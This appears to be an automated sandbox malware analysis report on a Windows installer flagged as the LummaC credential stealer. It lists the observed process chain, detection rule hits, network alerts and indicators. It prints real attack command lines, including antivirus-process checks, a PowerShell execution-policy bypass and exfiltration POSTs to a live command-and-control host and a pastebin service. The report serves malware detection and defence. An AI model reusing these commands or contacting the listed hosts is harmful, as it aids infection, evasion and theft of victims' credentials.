Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
!Set-up..exe

Overview

General Information

Sample name:!Set-up..exe
Analysis ID:1581739
MD5:27968eebcb115c6ecb62199a98ce9ee6
SHA1:7892f28bf31caf505e792268e138210588aa4d8d
SHA256:a124b81ef52d77f88c5b00f0a999482d429602f3cf5a413b3860c2b45909272d
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • !Set-up..exe (PID: 6112 cmdline: "C:\Users\user\Desktop\!Set-up..exe" MD5: 27968EEBCB115C6ECB62199A98CE9EE6)
    • cmd.exe (PID: 5788 cmdline: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5436 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6564 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6584 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6556 cmdline: cmd /c md 71992 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6568 cmdline: extrac32 /Y /E Ec MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 3356 cmdline: findstr /V "Ratio" Returning MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6984 cmdline: cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1788 cmdline: cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Banned.com (PID: 6460 cmdline: Banned.com V MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 6516 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 3224 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5788, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6584, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:56.856378+010020283713Unknown Traffic192.168.2.549784172.67.213.115443TCP
      2024-12-28T21:35:59.109107+010020283713Unknown Traffic192.168.2.549790172.67.213.115443TCP
      2024-12-28T21:36:01.379888+010020283713Unknown Traffic192.168.2.549797172.67.213.115443TCP
      2024-12-28T21:36:03.672548+010020283713Unknown Traffic192.168.2.549803172.67.213.115443TCP
      2024-12-28T21:36:05.830553+010020283713Unknown Traffic192.168.2.549809172.67.213.115443TCP
      2024-12-28T21:36:08.201372+010020283713Unknown Traffic192.168.2.549815172.67.213.115443TCP
      2024-12-28T21:36:10.507535+010020283713Unknown Traffic192.168.2.549821172.67.213.115443TCP
      2024-12-28T21:36:13.624453+010020283713Unknown Traffic192.168.2.549831172.67.213.115443TCP
      2024-12-28T21:36:15.857196+010020283713Unknown Traffic192.168.2.549836172.67.75.40443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:57.889164+010020546531A Network Trojan was detected192.168.2.549784172.67.213.115443TCP
      2024-12-28T21:35:59.860017+010020546531A Network Trojan was detected192.168.2.549790172.67.213.115443TCP
      2024-12-28T21:36:14.406950+010020546531A Network Trojan was detected192.168.2.549831172.67.213.115443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:57.889164+010020498361A Network Trojan was detected192.168.2.549784172.67.213.115443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:35:59.860017+010020498121A Network Trojan was detected192.168.2.549790172.67.213.115443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T21:36:04.494462+010020480941Malware Command and Control Activity Detected192.168.2.549803172.67.213.115443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: !Set-up..exeVirustotal: Detection: 15%Perma Link
      Source: !Set-up..exeReversingLabs: Detection: 16%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
      Source: !Set-up..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49784 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49797 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49809 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49815 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49821 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49831 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.5:49836 version: TLS 1.2
      Source: !Set-up..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49790 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49790 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49784 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49784 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49803 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49831 -> 172.67.213.115:443
      Connects to a pastebin service (likely for C&C)
      Source: unknownDNS query: name: rentry.co
      Source: Joe Sandbox ViewIP Address: 172.67.213.115 172.67.213.115
      Source: Joe Sandbox ViewIP Address: 172.67.75.40 172.67.75.40
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49790 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49797 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49784 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49809 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49815 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49803 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49831 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49821 -> 172.67.213.115:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49836 -> 172.67.75.40:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LMN9VRPDP5JIZR2K4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12831Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NXVOOFBV7DOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15037Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GO21UPWVTOIT6TU1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20557Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7R2O5KRSM9MP5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RI5EHQNV84UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587822Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: fallyjustif.click
      Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
      Source: global trafficDNS traffic detected: DNS query: xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi
      Source: global trafficDNS traffic detected: DNS query: fallyjustif.click
      Source: global trafficDNS traffic detected: DNS query: rentry.co
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fallyjustif.click
      Source: !Set-up..exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: !Set-up..exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
      Source: !Set-up..exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: !Set-up..exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: !Set-up..exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Writing.9.dr, Banned.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: !Set-up..exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
      Source: Banned.com.2.dr, Ford.9.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: !Set-up..exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: !Set-up..exe, Writing.9.dr, Banned.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Banned.com.2.dr, Ford.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Writing.9.dr, Banned.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: !Set-up..exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: !Set-up..exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: !Set-up..exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: !Set-up..exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: !Set-up..exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: !Set-up..exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: !Set-up..exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: !Set-up..exeString found in binary or memory: http://ocsp.digicert.com0
      Source: !Set-up..exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: !Set-up..exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: !Set-up..exeString found in binary or memory: http://ocsp.digicert.com0I
      Source: !Set-up..exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Writing.9.dr, Banned.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: !Set-up..exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
      Source: !Set-up..exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
      Source: !Set-up..exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
      Source: Banned.com.2.dr, Ford.9.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Writing.9.dr, Banned.com.2.dr, Ford.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Writing.9.dr, Banned.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: powershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: !Set-up..exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
      Source: Banned.com.2.dr, Ford.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: !Set-up..exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
      Source: Writing.9.dr, Banned.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: !Set-up..exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
      Source: Banned.com, 0000000D.00000000.2078706005.0000000000785000.00000002.00000001.01000000.00000007.sdmp, Banned.com.2.dr, Ford.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: !Set-up..exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: !Set-up..exeString found in binary or memory: http://www.teamviewer.com
      Source: powershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.drString found in binary or memory: https://rentry.co/
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/hZ#l
      Source: Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.drString found in binary or memory: https://rentry.co/static/icons/512.png
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.pnghZ#l
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.drString found in binary or memory: https://rentry.co/what
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/whathZ#l
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/whathZ#l(M/
      Source: Writing.9.dr, Banned.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Banned.com.2.dr, Ford.9.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49784 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49790 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49797 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49809 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49815 version: TLS 1.2
